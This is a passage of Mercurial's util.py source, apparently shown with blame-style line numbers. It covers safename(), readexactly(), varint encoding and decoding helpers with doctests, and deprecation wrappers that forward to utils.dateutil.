3919 3940 f: filename to rename
3920 3941 tag: a string tag that will be included in the new name
3921 3942 ctx: a context, in which the new name must not exist
3922 3943 others: a set of other filenames that the new name must not be in
3923 3944
3924 3945 Returns a file name of the form oldname~tag[~number] which does not exist
3925 3946 in the provided context and is not in the set of other names.
3926 3947 """
3927 3948 if others is None:
3928 3949 others = set()
3929 3950
3930 3951 fn = '%s~%s' % (f, tag)
3931 3952 if fn not in ctx and fn not in others:
3932 3953 return fn
3933 3954 for n in itertools.count(1):
3934 3955 fn = '%s~%s~%s' % (f, tag, n)
3935 3956 if fn not in ctx and fn not in others:
3936 3957 return fn
3937 3958
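# An illustrative sketch of safename(): membership is tested with ``in``,
# so a plain set can stand in for the changectx here (an assumption for
# demonstration only).
#
#     existing = {'foo', 'foo~base', 'foo~base~1'}
#     assert safename('foo', 'base', existing) == 'foo~base~2'
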
3938 3959 def readexactly(stream, n):
3939 3960 '''read n bytes from stream.read and abort if fewer were available'''
3940 3961 s = stream.read(n)
3941 3962 if len(s) < n:
3942 3963 raise error.Abort(_("stream ended unexpectedly"
3943 3964 " (got %d bytes, expected %d)")
3944 3965 % (len(s), n))
3945 3966 return s
3946 3967
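# A quick sketch of readexactly() semantics, using util's ``stringio``
# as the stream:
#
#     assert readexactly(stringio(b'abcdef'), 4) == b'abcd'
#     readexactly(stringio(b'ab'), 4)  # raises Abort: stream ended ...
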
3947 3968 def uvarintencode(value):
3948 3969 """Encode an unsigned integer value to a varint.
3949 3970
3950 3971 A varint is a variable length integer of 1 or more bytes. Each byte
3951 3972 except the last has the most significant bit set. The lower 7 bits of
3952 3973 each byte store the integer's binary representation, least significant
3953 3974 group first.
3954 3975
3955 3976 >>> uvarintencode(0)
3956 3977 '\\x00'
3957 3978 >>> uvarintencode(1)
3958 3979 '\\x01'
3959 3980 >>> uvarintencode(127)
3960 3981 '\\x7f'
3961 3982 >>> uvarintencode(1337)
3962 3983 '\\xb9\\n'
3963 3984 >>> uvarintencode(65536)
3964 3985 '\\x80\\x80\\x04'
3965 3986 >>> uvarintencode(-1)
3966 3987 Traceback (most recent call last):
3967 3988 ...
3968 3989 ProgrammingError: negative value for uvarint: -1
3969 3990 """
3970 3991 if value < 0:
3971 3992 raise error.ProgrammingError('negative value for uvarint: %d'
3972 3993 % value)
3973 3994 bits = value & 0x7f
3974 3995 value >>= 7
3975 3996 bytes = []
3976 3997 while value:
3977 3998 bytes.append(pycompat.bytechr(0x80 | bits))
3978 3999 bits = value & 0x7f
3979 4000 value >>= 7
3980 4001 bytes.append(pycompat.bytechr(bits))
3981 4002
3982 4003 return ''.join(bytes)
3983 4004
3984 4005 def uvarintdecodestream(fh):
3985 4006 """Decode an unsigned variable length integer from a stream.
3986 4007
3987 4008 The passed argument is anything that has a ``.read(N)`` method.
3988 4009
3989 4010 >>> try:
3990 4011 ... from StringIO import StringIO as BytesIO
3991 4012 ... except ImportError:
3992 4013 ... from io import BytesIO
3993 4014 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3994 4015 0
3995 4016 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3996 4017 1
3997 4018 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3998 4019 127
3999 4020 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4000 4021 1337
4001 4022 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4002 4023 65536
4003 4024 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4004 4025 Traceback (most recent call last):
4005 4026 ...
4006 4027 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4007 4028 """
4008 4029 result = 0
4009 4030 shift = 0
4010 4031 while True:
4011 4032 byte = ord(readexactly(fh, 1))
4012 4033 result |= ((byte & 0x7f) << shift)
4013 4034 if not (byte & 0x80):
4014 4035 return result
4015 4036 shift += 7
4016 4037
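# A hedged round-trip sketch tying the two varint helpers together
# (``stringio`` provides the ``read(N)`` interface the decoder expects):
#
#     for value in (0, 127, 128, 1337, 2 ** 42):
#         assert uvarintdecodestream(stringio(uvarintencode(value))) == value
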
4017 4038 ###
4018 4039 # Deprecation warnings for util.py splitting
4019 4040 ###
4020 4041
4021 4042 defaultdateformats = dateutil.defaultdateformats
4022 4043
4023 4044 extendeddateformats = dateutil.extendeddateformats
4024 4045
4025 4046 def makedate(*args, **kwargs):
4026 4047 msg = ("'util.makedate' is deprecated, "
4027 4048 "use 'utils.dateutil.makedate'")
4028 4049 nouideprecwarn(msg, "4.6")
4029 4050 return dateutil.makedate(*args, **kwargs)
4030 4051
4031 4052 def datestr(*args, **kwargs):
4032 4053 msg = ("'util.datestr' is deprecated, "
4033 4054 "use 'utils.dateutil.datestr'")
4034 4055 nouideprecwarn(msg, "4.6")
4036 4057 return dateutil.datestr(*args, **kwargs)
4037 4058
4038 4059 def shortdate(*args, **kwargs):
4039 4060 msg = ("'util.shortdate' is deprecated, "
4040 4061 "use 'utils.dateutil.shortdate'")
4041 4062 nouideprecwarn(msg, "4.6")
4042 4063 return dateutil.shortdate(*args, **kwargs)
4043 4064
4044 4065 def parsetimezone(*args, **kwargs):
4045 4066 msg = ("'util.parsetimezone' is deprecated, "
4046 4067 "use 'utils.dateutil.parsetimezone'")
4047 4068 nouideprecwarn(msg, "4.6")
4048 4069 return dateutil.parsetimezone(*args, **kwargs)
4049 4070
4050 4071 def strdate(*args, **kwargs):
4051 4072 msg = ("'util.strdate' is deprecated, "
4052 4073 "use 'utils.dateutil.strdate'")
4053 4074 nouideprecwarn(msg, "4.6")
4054 4075 return dateutil.strdate(*args, **kwargs)
4055 4076
4056 4077 def parsedate(*args, **kwargs):
4057 4078 msg = ("'util.parsedate' is deprecated, "
4058 4079 "use 'utils.dateutil.parsedate'")
4059 4080 nouideprecwarn(msg, "4.6")
4060 4081 return dateutil.parsedate(*args, **kwargs)
4061 4082
4062 4083 def matchdate(*args, **kwargs):
4063 4084 msg = ("'util.matchdate' is deprecated, "
4064 4085 "use 'utils.dateutil.matchdate'")
4065 4086 nouideprecwarn(msg, "4.6")
4066 4087 return dateutil.matchdate(*args, **kwargs)